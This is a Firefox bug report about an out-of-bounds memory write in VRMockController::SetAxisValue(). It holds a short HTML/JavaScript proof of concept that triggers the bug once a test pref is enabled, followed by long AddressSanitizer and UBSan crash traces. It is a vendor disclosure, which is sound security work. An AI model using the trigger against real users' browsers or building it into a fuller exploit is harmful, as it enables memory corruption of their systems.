1805161 - Arbitrary memory write through out-of-bound write in VRMockController::SetAxisValue()

Status: RESOLVED FIXED

(Core :: WebVR, defect, P3)

Description

[Taejin Jang]

Attachment: BE-2022-0001.html

Version

Firefox: Version 109.0a1 (2022-12-11) (64-bit)

PoC

1. Turn on dom.vr.puppet.enabled in about:config
2. Open the attachment which is PoC.

<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- dom.vr.puppet.enabled = true -->
<script>
    function trigger() {
        vrs = window.navigator.requestVRServiceTest();
        ctr = vrs.getVRController(1)
        ctr.setAxisValue(123123123, 1123123123)
    }
</script>
<button onclick="trigger()">CLICK</button>

3. Hit the "CLICK" Button

Output

Following log is Asan log

AddressSanitizer:DEADLYSIGNAL
=================================================================
==3860==ERROR: AddressSanitizer: SEGV on unknown address 0x62b01d6db194 (pc 0x7f3770109fb1 bp 0x7ffc5ee7d5b0 sp 0x7ffc5ee7d5b0 T0)
==3860==The signal is caused by a WRITE memory access.
    #0 0x7f3770109fb1 in mozilla::dom::VRMockController::SetAxisValue(unsigned int, double) /home/jtjisgod/firefox/build/mozilla-unified/dom/vr/VRServiceTest.cpp:482:41
    #1 0x7f376b750419 in mozilla::dom::VRMockController_Binding::setAxisValue(JSContext*, JS::Handle<JSObject*>, void*, JSJitMethodCallArgs const&) /home/jtjisgod/firefox/build/mozilla-unified/objdir-ff-asan/dom/bindings/VRServiceTestBinding.cpp:1019:24
    #2 0x7f376c7111be in bool mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions>(JSContext*, unsigned int, JS::Value*) /home/jtjisgod/firefox/build/mozilla-unified/dom/bindings/BindingUtils.cpp:3287:13
    #3 0x7f3776379502 in CallJSNative /home/jtjisgod/firefox/build/mozilla-unified/js/src/vm/Interpreter.cpp:459:13
    #4 0x7f3776379502 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct, js::CallReason) /home/jtjisgod/firefox/build/mozilla-unified/js/src/vm/Interpreter.cpp:547:12
    #5 0x7f377636672e in InternalCall /home/jtjisgod/firefox/build/mozilla-unified/js/src/vm/Interpreter.cpp:614:10
    #6 0x7f377636672e in CallFromStack /home/jtjisgod/firefox/build/mozilla-unified/js/src/vm/Interpreter.cpp:619:10
    #7 0x7f377636672e in Interpret(JSContext*, js::RunState&) /home/jtjisgod/firefox/build/mozilla-unified/js/src/vm/Interpreter.cpp:3379:16
    #8 0x7f377635157e in js::RunScript(JSContext*, js::RunState&) /home/jtjisgod/firefox/build/mozilla-unified/js/src/vm/Interpreter.cpp:431:13
    #9 0x7f377637965e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct, js::CallReason) /home/jtjisgod/firefox/build/mozilla-unified/js/src/vm/Interpreter.cpp:579:13
    #10 0x7f377637b4f2 in InternalCall /home/jtjisgod/firefox/build/mozilla-unified/js/src/vm/Interpreter.cpp:614:10
    #11 0x7f377637b4f2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>, js::CallReason) /home/jtjisgod/firefox/build/mozilla-unified/js/src/vm/Interpreter.cpp:646:8
    #12 0x7f37764b3fc8 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/jtjisgod/firefox/build/mozilla-unified/js/src/vm/CallAndConstruct.cpp:117:10
    #13 0x7f376c0e1925 in mozilla::dom::EventHandlerNonNull::Call(mozilla::dom::BindingCallContext&, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/jtjisgod/firefox/build/mozilla-unified/objdir-ff-asan/dom/bindings/EventHandlerBinding.cpp:65:37
    #14 0x7f376d3cdae4 in Call<nsCOMPtr<mozilla::dom::EventTarget> > /home/jtjisgod/firefox/build/mozilla-unified/objdir-ff-asan/dist/include/mozilla/dom/EventHandlerBinding.h:82:12
    #15 0x7f376d3cdae4 in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /home/jtjisgod/firefox/build/mozilla-unified/dom/events/JSEventHandler.cpp:201:12
    #16 0x7f376d3862ce in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /home/jtjisgod/firefox/build/mozilla-unified/dom/events/EventListenerManager.cpp:1317:22
    #17 0x7f376d38793a in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /home/jtjisgod/firefox/build/mozilla-unified/dom/events/EventListenerManager.cpp:1507:17
    #18 0x7f376d3e0306 in HandleEvent /home/jtjisgod/firefox/build/mozilla-unified/dom/events/EventListenerManager.h:395:5
    #19 0x7f376d3e0306 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /home/jtjisgod/firefox/build/mozilla-unified/dom/events/EventDispatcher.cpp:347:17
    #20 0x7f376d36f9bb in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/jtjisgod/firefox/build/mozilla-unified/dom/events/EventDispatcher.cpp:549:16
    #21 0x7f376d374a99 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/jtjisgod/firefox/build/mozilla-unified/dom/events/EventDispatcher.cpp:1118:11
    #22 0x7f377114e74e in mozilla::PresShell::EventHandler::DispatchEventToDOM(mozilla::WidgetEvent*, nsEventStatus*, nsPresShellEventCB*) /home/jtjisgod/firefox/build/mozilla-unified/layout/base/PresShell.cpp:8768:7
    #23 0x7f377114b543 in mozilla::PresShell::EventHandler::DispatchEvent(mozilla::EventStateManager*, mozilla::WidgetEvent*, bool, nsEventStatus*, nsIContent*) /home/jtjisgod/firefox/build/mozilla-unified/layout/base/PresShell.cpp:8340:7
    #24 0x7f3771142883 in mozilla::PresShell::EventHandler::HandleEventWithCurrentEventInfo(mozilla::WidgetEvent*, nsEventStatus*, bool, nsIContent*) /home/jtjisgod/firefox/build/mozilla-unified/layout/base/PresShell.cpp:8272:17
    #25 0x7f3771149211 in mozilla::PresShell::EventHandler::HandleEventWithTarget(mozilla::WidgetEvent*, nsIFrame*, nsIContent*, nsEventStatus*, bool, nsIContent**, nsIContent*) /home/jtjisgod/firefox/build/mozilla-unified/layout/base/PresShell.cpp:8179:17
    #26 0x7f376d2c70ba in HandleEventWithTarget /home/jtjisgod/firefox/build/mozilla-unified/objdir-ff-asan/dist/include/mozilla/PresShell.h:667:25
    #27 0x7f376d2c70ba in mozilla::EventStateManager::InitAndDispatchClickEvent(mozilla::WidgetMouseEvent*, nsEventStatus*, mozilla::EventMessage, mozilla::PresShell*, nsIContent*, AutoWeakFrame, bool, nsIContent*) /home/jtjisgod/firefox/build/mozilla-unified/dom/events/EventStateManager.cpp:5302:29
    #28 0x7f376d2c7b09 in mozilla::EventStateManager::DispatchClickEvents(mozilla::PresShell*, mozilla::WidgetMouseEvent*, nsEventStatus*, nsIContent*, nsIContent*) /home/jtjisgod/firefox/build/mozilla-unified/dom/events/EventStateManager.cpp:5404:17
    #29 0x7f376d2c143e in mozilla::EventStateManager::PostHandleMouseUp(mozilla::WidgetMouseEvent*, nsEventStatus*, nsIContent*) /home/jtjisgod/firefox/build/mozilla-unified/dom/events/EventStateManager.cpp:5347:17
    #30 0x7f376d2bee08 in mozilla::EventStateManager::PostHandleEvent(nsPresContext*, mozilla::WidgetEvent*, nsIFrame*, nsEventStatus*, nsIContent*) /home/jtjisgod/firefox/build/mozilla-unified/dom/events/EventStateManager.cpp:3613:18
    #31 0x7f377114b8a2 in mozilla::PresShell::EventHandler::DispatchEvent(mozilla::EventStateManager*, mozilla::WidgetEvent*, bool, nsEventStatus*, nsIContent*) /home/jtjisgod/firefox/build/mozilla-unified/layout/base/PresShell.cpp:8354:30
    #32 0x7f3771142883 in mozilla::PresShell::EventHandler::HandleEventWithCurrentEventInfo(mozilla::WidgetEvent*, nsEventStatus*, bool, nsIContent*) /home/jtjisgod/firefox/build/mozilla-unified/layout/base/PresShell.cpp:8272:17
    #33 0x7f37711419da in mozilla::PresShell::EventHandler::HandleEventUsingCoordinates(nsIFrame*, mozilla::WidgetGUIEvent*, nsEventStatus*, bool) /home/jtjisgod/firefox/build/mozilla-unified/layout/base/PresShell.cpp:7221:30
    #34 0x7f377113f714 in mozilla::PresShell::EventHandler::HandleEvent(nsIFrame*, mozilla::WidgetGUIEvent*, bool, nsEventStatus*) /home/jtjisgod/firefox/build/mozilla-unified/layout/base/PresShell.cpp:7024:12
    #35 0x7f377113de36 in mozilla::PresShell::HandleEvent(nsIFrame*, mozilla::WidgetGUIEvent*, bool, nsEventStatus*) /home/jtjisgod/firefox/build/mozilla-unified/layout/base/PresShell.cpp:6967:23
    #36 0x7f37706fa83e in nsViewManager::DispatchEvent(mozilla::WidgetGUIEvent*, nsView*, nsEventStatus*) /home/jtjisgod/firefox/build/mozilla-unified/view/nsViewManager.cpp:678:18
    #37 0x7f37706fa1d6 in nsView::HandleEvent(mozilla::WidgetGUIEvent*, bool) /home/jtjisgod/firefox/build/mozilla-unified/view/nsView.cpp:1136:9
    #38 0x7f3770786ba2 in mozilla::widget::PuppetWidget::DispatchEvent(mozilla::WidgetGUIEvent*, nsEventStatus&) /home/jtjisgod/firefox/build/mozilla-unified/widget/PuppetWidget.cpp:352:37
    #39 0x7f3768f60333 in mozilla::layers::APZCCallbackHelper::DispatchWidgetEvent(mozilla::WidgetGUIEvent&) /home/jtjisgod/firefox/build/mozilla-unified/gfx/layers/apz/util/APZCCallbackHelper.cpp:509:21
    #40 0x7f376f7a7e4a in DispatchWidgetEventViaAPZ /home/jtjisgod/firefox/build/mozilla-unified/dom/ipc/BrowserChild.cpp:1801:10
    #41 0x7f376f7a7e4a in mozilla::dom::BrowserChild::HandleRealMouseButtonEvent(mozilla::WidgetMouseEvent const&, mozilla::layers::ScrollableLayerGuid const&, unsigned long const&) /home/jtjisgod/firefox/build/mozilla-unified/dom/ipc/BrowserChild.cpp:1764:3
    #42 0x7f376f7a7076 in mozilla::dom::BrowserChild::ProcessPendingCoalescedMouseDataAndDispatchEvents() /home/jtjisgod/firefox/build/mozilla-unified/dom/ipc/BrowserChild.cpp:1592:7
    #43 0x7f376f7aab0d in mozilla::dom::BrowserChild::RecvRealMouseButtonEvent(mozilla::WidgetMouseEvent const&, mozilla::layers::ScrollableLayerGuid const&, unsigned long const&) /home/jtjisgod/firefox/build/mozilla-unified/dom/ipc/BrowserChild.cpp:1728:5
    #44 0x7f376f96cb4c in mozilla::dom::PBrowserChild::OnMessageReceived(IPC::Message const&) /home/jtjisgod/firefox/build/mozilla-unified/objdir-ff-asan/ipc/ipdl/PBrowserChild.cpp:5697:80
    #45 0x7f376fa6c36f in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&) /home/jtjisgod/firefox/build/mozilla-unified/objdir-ff-asan/ipc/ipdl/PContentChild.cpp:8727:32
    #46 0x7f376805f381 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&) /home/jtjisgod/firefox/build/mozilla-unified/ipc/glue/MessageChannel.cpp:1756:25
    #47 0x7f376805bf9f in mozilla::ipc::MessageChannel::DispatchMessage(mozilla::ipc::ActorLifecycleProxy*, mozilla::UniquePtr<IPC::Message, mozilla::DefaultDelete<IPC::Message> >) /home/jtjisgod/firefox/build/mozilla-unified/ipc/glue/MessageChannel.cpp:1681:9
    #48 0x7f376805d056 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::ActorLifecycleProxy*, mozilla::ipc::MessageChannel::MessageTask&) /home/jtjisgod/firefox/build/mozilla-unified/ipc/glue/MessageChannel.cpp:1481:3
    #49 0x7f376805df5a in mozilla::ipc::MessageChannel::MessageTask::Run() /home/jtjisgod/firefox/build/mozilla-unified/ipc/glue/MessageChannel.cpp:1579:14
    #50 0x7f37666edfd0 in mozilla::RunnableTask::Run() /home/jtjisgod/firefox/build/mozilla-unified/xpcom/threads/TaskController.cpp:538:16
    #51 0x7f37666dac61 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock<mozilla::Mutex&> const&) /home/jtjisgod/firefox/build/mozilla-unified/xpcom/threads/TaskController.cpp:851:26
    #52 0x7f37666d7a85 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock<mozilla::Mutex&> const&) /home/jtjisgod/firefox/build/mozilla-unified/xpcom/threads/TaskController.cpp:683:15
    #53 0x7f37666d82dc in mozilla::TaskController::ProcessPendingMTTask(bool) /home/jtjisgod/firefox/build/mozilla-unified/xpcom/threads/TaskController.cpp:461:36
    #54 0x7f37666dbf11 in operator() /home/jtjisgod/firefox/build/mozilla-unified/xpcom/threads/TaskController.cpp:187:37
    #55 0x7f37666dbf11 in mozilla::detail::RunnableFunction<mozilla::TaskController::InitializeInternal()::$_2>::Run() /home/jtjisgod/firefox/build/mozilla-unified/objdir-ff-asan/dist/include/nsThreadUtils.h:546:5
    #56 0x7f3766718be7 in nsThread::ProcessNextEvent(bool, bool*) /home/jtjisgod/firefox/build/mozilla-unified/xpcom/threads/nsThread.cpp:1204:16
    #57 0x7f3766725072 in NS_ProcessNextEvent(nsIThread*, bool) /home/jtjisgod/firefox/build/mozilla-unified/xpcom/threads/nsThreadUtils.cpp:474:10
    #58 0x7f3768067843 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/jtjisgod/firefox/build/mozilla-unified/ipc/glue/MessagePump.cpp:85:21
    #59 0x7f3767ec3350 in RunInternal /home/jtjisgod/firefox/build/mozilla-unified/ipc/chromium/src/base/message_loop.cc:381:10
    #60 0x7f3767ec3350 in RunHandler /home/jtjisgod/firefox/build/mozilla-unified/ipc/chromium/src/base/message_loop.cc:374:3
    #61 0x7f3767ec3350 in MessageLoop::Run() /home/jtjisgod/firefox/build/mozilla-unified/ipc/chromium/src/base/message_loop.cc:356:3
    #62 0x7f3770826bec in nsBaseAppShell::Run() /home/jtjisgod/firefox/build/mozilla-unified/widget/nsBaseAppShell.cpp:150:27
    #63 0x7f3775f440e0 in XRE_RunAppShell() /home/jtjisgod/firefox/build/mozilla-unified/toolkit/xre/nsEmbedFunctions.cpp:884:20
    #64 0x7f3767ec3350 in RunInternal /home/jtjisgod/firefox/build/mozilla-unified/ipc/chromium/src/base/message_loop.cc:381:10
    #65 0x7f3767ec3350 in RunHandler /home/jtjisgod/firefox/build/mozilla-unified/ipc/chromium/src/base/message_loop.cc:374:3
    #66 0x7f3767ec3350 in MessageLoop::Run() /home/jtjisgod/firefox/build/mozilla-unified/ipc/chromium/src/base/message_loop.cc:356:3
    #67 0x7f3775f42e7d in XRE_InitChildProcess(int, char**, XREChildData const*) /home/jtjisgod/firefox/build/mozilla-unified/toolkit/xre/nsEmbedFunctions.cpp:743:34
    #68 0x557b5518f9d8 in content_process_main /home/jtjisgod/firefox/build/mozilla-unified/browser/app/../../ipc/contentproc/plugin-container.cpp:57:28
    #69 0x557b5518f9d8 in main /home/jtjisgod/firefox/build/mozilla-unified/browser/app/nsBrowserApp.cpp:359:18
    #70 0x7f378027fd8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #71 0x7f378027fe3f in __libc_start_main csu/../csu/libc-start.c:392:3
    #72 0x557b550cd9b8 in _start (/home/jtjisgod/firefox/build/mozilla-unified/objdir-ff-asan/dist/bin/firefox+0xab9b8)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/jtjisgod/firefox/build/mozilla-unified/dom/vr/VRServiceTest.cpp:482:41 in mozilla::dom::VRMockController::SetAxisValue(unsigned int, double)
==3860==ABORTING

Following log is UndefinedBehaviorSanitizer.

[2022-12-12T12:26:07Z ERROR glean_core::metrics::ping] Invalid reason code startup for ping newtab
/builds/worker/checkouts/gecko/dom/vr/VRServiceTest.cpp:482:3: runtime error: index 123123123 out of bounds for type 'float[16]'
    #0 0x7faf6224c80a in mozilla::dom::VRMockController::SetAxisValue(unsigned int, double) /builds/worker/checkouts/gecko/dom/vr/VRServiceTest.cpp:482:41
    #1 0x7faf5ea13366 in mozilla::dom::VRMockController_Binding::setAxisValue(JSContext*, JS::Handle<JSObject*>, void*, JSJitMethodCallArgs const&) /builds/worker/workspace/obj-build/dom/bindings/VRServiceTestBinding.cpp:1019:24
    #2 0x7faf5f4db915 in bool mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions>(JSContext*, unsigned int, JS::Value*) /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3287:13
    #3 0x7faf68f04cef in CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:459:13
    #4 0x7faf68f04cef in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:547:12
    #5 0x7faf68ef3dea in InternalCall /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:614:10
    #6 0x7faf68ef3dea in CallFromStack /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:619:10
    #7 0x7faf68ef3dea in Interpret(JSContext*, js::RunState&) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3379:16
    #8 0x7faf68ed7e9c in js::RunScript(JSContext*, js::RunState&) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:431:13
    #9 0x7faf68f04e1a in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:579:13
    #10 0x7faf68f06a5f in InternalCall /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:614:10
    #11 0x7faf68f06a5f in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:646:8
    #12 0x7faf6789137d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/checkouts/gecko/js/src/vm/CallAndConstruct.cpp:117:10
    #13 0x7faf5f0df0a3 in mozilla::dom::EventHandlerNonNull::Call(mozilla::dom::BindingCallContext&, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/obj-build/dom/bindings/EventHandlerBinding.cpp:65:37
    #14 0x7faf5fed19f4 in void mozilla::dom::EventHandlerNonNull::Call<nsCOMPtr<mozilla::dom::EventTarget>>(nsCOMPtr<mozilla::dom::EventTarget> const&, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/obj-build/dist/include/mozilla/dom/EventHandlerBinding.h:82:12
    #15 0x7faf5fecffc4 in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/checkouts/gecko/dom/events/JSEventHandler.cpp:201:12
    #16 0x7faf5fe964bc in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/checkouts/gecko/dom/events/EventListenerManager.cpp:1317:22
    #17 0x7faf5fe97d1b in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/checkouts/gecko/dom/events/EventListenerManager.cpp:1507:17
    #18 0x7faf5fe85d02 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/checkouts/gecko/dom/events/EventDispatcher.cpp:347:17
    #19 0x7faf5fe845b4 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/checkouts/gecko/dom/events/EventDispatcher.cpp:549:16
    #20 0x7faf5fe8872d in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/checkouts/gecko/dom/events/EventDispatcher.cpp:1118:11
    #21 0x7faf62e6d4b1 in mozilla::PresShell::EventHandler::DispatchEventToDOM(mozilla::WidgetEvent*, nsEventStatus*, nsPresShellEventCB*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:8759:7
    #22 0x7faf62e6adea in mozilla::PresShell::EventHandler::DispatchEvent(mozilla::EventStateManager*, mozilla::WidgetEvent*, bool, nsEventStatus*, nsIContent*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:8331:7
    #23 0x7faf62e64666 in mozilla::PresShell::EventHandler::HandleEventWithCurrentEventInfo(mozilla::WidgetEvent*, nsEventStatus*, bool, nsIContent*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:8263:17
    #24 0x7faf62e68a28 in mozilla::PresShell::EventHandler::HandleEventWithTarget(mozilla::WidgetEvent*, nsIFrame*, nsIContent*, nsEventStatus*, bool, nsIContent**, nsIContent*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:8170:17
    #25 0x7faf5fe04d60 in HandleEventWithTarget /builds/worker/workspace/obj-build/dist/include/mozilla/PresShell.h:667:25
    #26 0x7faf5fe04d60 in mozilla::EventStateManager::InitAndDispatchClickEvent(mozilla::WidgetMouseEvent*, nsEventStatus*, mozilla::EventMessage, mozilla::PresShell*, nsIContent*, AutoWeakFrame, bool, nsIContent*) /builds/worker/checkouts/gecko/dom/events/EventStateManager.cpp:5302:29
    #27 0x7faf5fe0540f in mozilla::EventStateManager::DispatchClickEvents(mozilla::PresShell*, mozilla::WidgetMouseEvent*, nsEventStatus*, nsIContent*, nsIContent*) /builds/worker/checkouts/gecko/dom/events/EventStateManager.cpp:5404:17
    #28 0x7faf5fdff674 in mozilla::EventStateManager::PostHandleMouseUp(mozilla::WidgetMouseEvent*, nsEventStatus*, nsIContent*) /builds/worker/checkouts/gecko/dom/events/EventStateManager.cpp:5347:17
    #29 0x7faf5fdfcdaf in mozilla::EventStateManager::PostHandleEvent(nsPresContext*, mozilla::WidgetEvent*, nsIFrame*, nsEventStatus*, nsIContent*) /builds/worker/checkouts/gecko/dom/events/EventStateManager.cpp:3613:18
    #30 0x7faf62e6af1b in mozilla::PresShell::EventHandler::DispatchEvent(mozilla::EventStateManager*, mozilla::WidgetEvent*, bool, nsEventStatus*, nsIContent*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:8345:30
    #31 0x7faf62e64666 in mozilla::PresShell::EventHandler::HandleEventWithCurrentEventInfo(mozilla::WidgetEvent*, nsEventStatus*, bool, nsIContent*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:8263:17
    #32 0x7faf62e63a0a in mozilla::PresShell::EventHandler::HandleEventUsingCoordinates(nsIFrame*, mozilla::WidgetGUIEvent*, nsEventStatus*, bool) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:7212:30
    #33 0x7faf62e62075 in mozilla::PresShell::EventHandler::HandleEvent(nsIFrame*, mozilla::WidgetGUIEvent*, bool, nsEventStatus*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:7015:12
    #34 0x7faf62e60b34 in mozilla::PresShell::HandleEvent(nsIFrame*, mozilla::WidgetGUIEvent*, bool, nsEventStatus*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:6958:23
    #35 0x7faf626fbe40 in nsViewManager::DispatchEvent(mozilla::WidgetGUIEvent*, nsView*, nsEventStatus*) /builds/worker/checkouts/gecko/view/nsViewManager.cpp:678:18
    #36 0x7faf626fba75 in nsView::HandleEvent(mozilla::WidgetGUIEvent*, bool) /builds/worker/checkouts/gecko/view/nsView.cpp:1136:9
    #37 0x7faf62774fe0 in mozilla::widget::PuppetWidget::DispatchEvent(mozilla::WidgetGUIEvent*, nsEventStatus&) /builds/worker/checkouts/gecko/widget/PuppetWidget.cpp:352:37
    #38 0x7faf5cade20b in mozilla::layers::APZCCallbackHelper::DispatchWidgetEvent(mozilla::WidgetGUIEvent&) /builds/worker/checkouts/gecko/gfx/layers/apz/util/APZCCallbackHelper.cpp:509:21
    #39 0x7faf61b1475d in DispatchWidgetEventViaAPZ /builds/worker/checkouts/gecko/dom/ipc/BrowserChild.cpp:1801:10
    #40 0x7faf61b1475d in mozilla::dom::BrowserChild::HandleRealMouseButtonEvent(mozilla::WidgetMouseEvent const&, mozilla::layers::ScrollableLayerGuid const&, unsigned long const&) /builds/worker/checkouts/gecko/dom/ipc/BrowserChild.cpp:1764:3
    #41 0x7faf61b14099 in mozilla::dom::BrowserChild::ProcessPendingCoalescedMouseDataAndDispatchEvents() /builds/worker/checkouts/gecko/dom/ipc/BrowserChild.cpp:1592:7
    #42 0x7faf61b161fd in mozilla::dom::BrowserChild::RecvRealMouseButtonEvent(mozilla::WidgetMouseEvent const&, mozilla::layers::ScrollableLayerGuid const&, unsigned long const&) /builds/worker/checkouts/gecko/dom/ipc/BrowserChild.cpp:1728:5
    #43 0x7faf61c7b8cf in mozilla::dom::PBrowserChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/obj-build/ipc/ipdl/PBrowserChild.cpp:5697:80
    #44 0x7faf61d1a02e in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/obj-build/ipc/ipdl/PContentChild.cpp:8727:32
    #45 0x7faf5be2ba5f in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1756:25
    #46 0x7faf5be29523 in mozilla::ipc::MessageChannel::DispatchMessage(mozilla::ipc::ActorLifecycleProxy*, mozilla::UniquePtr<IPC::Message, mozilla::DefaultDelete<IPC::Message>>) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1681:9
    #47 0x7faf5be29ee1 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::ActorLifecycleProxy*, mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1481:3
    #48 0x7faf5be2ac4e in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1579:14
    #49 0x7faf5a822f09 in mozilla::RunnableTask::Run() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:538:16
    #50 0x7faf5a819e27 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock<mozilla::Mutex&> const&) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:851:26
    #51 0x7faf5a8170a8 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock<mozilla::Mutex&> const&) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:683:15
    #52 0x7faf5a8177d0 in mozilla::TaskController::ProcessPendingMTTask(bool) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:461:36
    #53 0x7faf5a829011 in operator() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:187:37
    #54 0x7faf5a829011 in mozilla::detail::RunnableFunction<mozilla::TaskController::InitializeInternal()::$_2>::Run() /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:546:5
    #55 0x7faf5a84c0f0 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1204:16
    #56 0x7faf5a856884 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:474:10
    #57 0x7faf5be31af8 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85:21
    #58 0x7faf5bcd2977 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:381:10
    #59 0x7faf5bcd2977 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374:3
    #60 0x7faf5bcd2977 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356:3
    #61 0x7faf627eefb9 in nsBaseAppShell::Run() /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:150:27
    #62 0x7faf6742ae68 in XRE_RunAppShell() /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:884:20
    #63 0x7faf5bcd2977 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:381:10
    #64 0x7faf5bcd2977 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374:3
